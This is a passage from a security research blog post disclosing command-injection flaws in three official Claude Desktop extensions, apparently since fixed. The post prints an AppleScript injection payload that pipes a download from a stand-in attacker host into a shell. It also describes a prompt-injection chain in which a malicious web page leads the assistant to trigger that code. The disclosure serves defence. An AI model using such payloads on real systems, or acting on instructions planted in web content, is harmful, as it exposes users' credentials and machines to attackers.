Back Koi Research PromptJacking: The Critical RCEs in Claude Desktop That Turn Questions Into Exploits Oren Yomtov , , November 5, 2025 TLDR; Three official Claude extensions. 350,000+ downloads. All vulnerable to remote code execution . Hi again. This is a reminder that while we often write about malicious extensions from unknown developers, or large scale supply chain compromises, sometimes, even the most trusted developers can make mistakes that may wreak havoc on your enterprise... We’ve identified severe RCE vulnerabilities in three extensions that were written, published, and promoted by Anthropic themselves - the Chrome, iMessage, and Apple Notes connectors, and are sitting at the very top of Claude Desktop's extension marketplace . Every single one of these had the same issue: unsanitized command injection - a basic but critical security flaw. In practice, that means a single malicious website could turn an innocent question like "Where can I play paddle in Brooklyn?" into arbitrary code execution on your machine . SSH keys, AWS credentials, browser passwords - all could be exposed simply because you asked Claude a question. No malware installation. No phishing link. Just a normal interaction with your AI assistant . Pretty nasty stuff. All three vulnerabilities in these three extensions were confirmed as high-severity (CVSS 8.9) by Anthropic . But don’t fret, they’re all fixed now. Lets Take A Step Back, What Are Even Claude Desktop Extensions? Claude Desktop Extensions are packaged MCP servers that can be installed with a single click from Anthropic's extension marketplace. Each is distributed as an .mcpb bundle, essentially a zip archive containing the MCP server code and a manifest describing its functions. They're conceptually similar to Chrome Extensions (.crx), providing that same one-click install experience. Here's the difference: Chrome extensions run in a sandboxed browser process. Claude Desktop Extensions? They run fully unsandboxed on your machine , with full system permissions. That means they can read any file, execute any command, access credentials, and modify system settings. They're not lightweight plugins - they're privileged executors bridging Claude's AI model and your operating system . This is what made the command injection vulnerability so severe. The Vulnerability: Command Injection 101 The flaw itself is simple - which makes its presence in production code more surprising. Each MCP server exposed commands that accepted user-provided input and passed it directly into AppleScript commands without any sanitization or escaping. These AppleScript commands in turn could execute shell commands with full privileges. For example, when Claude was asked to "open this URL in Chrome," the extension would construct an AppleScript string using template literals, directly interpolating the user-provided URL into commands like: tell application "Google Chrome" to open location "${url}" The URL was inserted without any escaping or validation. A maliciously crafted URL could then break out of the string context and inject arbitrary AppleScript commands, which could execute shell commands with full privileges . The exploit was as simple as injecting: "& do shell script "curl https://attacker.com/trojan | sh"&" This would result in the following AppleScript being executed: tell application "Google Chrome" to open location ""& do shell script "curl https://attacker.com/trojan | sh" &"" The quotes break out of the URL string, the & concatenates a malicious command, and AppleScript's do shell script executes arbitrary malicious code. This isn't an obscure bug class. It's one of the oldest and best-understood categories of software vulnerabilities. From Question to Compromise: When Asking Your AI Assistant Gets You Pwned You might think: "Sure, but no one's going to manually type a malicious command into Claude." And that's true. The real risk comes from something else entirely: prompt injection through web content . Claude routinely fetches and reads web pages to answer user questions. That's part of how it works: it searches the web, reads the top results, and summarizes them for you. Now imagine an attacker controls one of those web pages. They can make their page appear in search results or compromise legitimate ones. They can also serve special content when they detect Claude's user agent. The attack flow When Claude reads that page, it can unknowingly process instructions embedded in the content - instructions that exploit the vulnerable MCP extension. In this scenario, the chat client itself becomes the attack vector . The assistant, acting in good faith, executes malicious commands because it believes it's following legitimate instructions. That means: Any web page in search results could become an attack surface Compromised websites could silently trigger local code execution Because these extensions ran with full system permissions, this chain of trust (chat client → web content → loca